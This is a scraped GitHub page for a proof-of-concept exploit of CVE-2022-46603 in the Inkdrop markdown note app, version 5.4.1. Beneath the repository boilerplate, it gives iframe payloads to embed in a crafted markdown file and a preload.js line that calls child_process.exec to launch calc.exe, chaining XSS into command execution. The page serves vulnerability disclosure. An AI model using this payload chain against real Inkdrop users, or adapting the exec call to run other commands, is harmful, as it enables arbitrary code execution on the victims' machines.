Headline
CVE-2022-46603: GitHub - 10cks/inkdropPoc: inkdrop XSS to RCE Poc
An issue in Inkdrop v5.4.1 allows attackers to execute arbitrary commands via uploading a crafted markdown file.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
inkdrop XSS to RCE Poc
Product Presentation:
Solely designed for Markdown to improve your dev workflow. Get a low-friction personal note-taking workflow and accomplish more. With your notes well-organized effortlessly, you can stay focused on doing your best work.
Product Website: https://www.inkdrop.app/
Product download Address: https://d3ip0rje8grhnl.cloudfront.net/v5.4.1/Inkdrop-demo-5.4.1-Windows.zip
Version: 5.4.1
Payload: write payload into markdown file,’preload.js’ need absolute address to introduce.
<iframe src=javascript:alert('xss')></iframe>
<iframe src=1 preload="C:\Users\root\Downloads\Inkdrop-demo-5.4.1-Windows\resources\app\preload.js"></iframe> # absolute path
preload.js:
require('child_process').exec('calc.exe')
POC video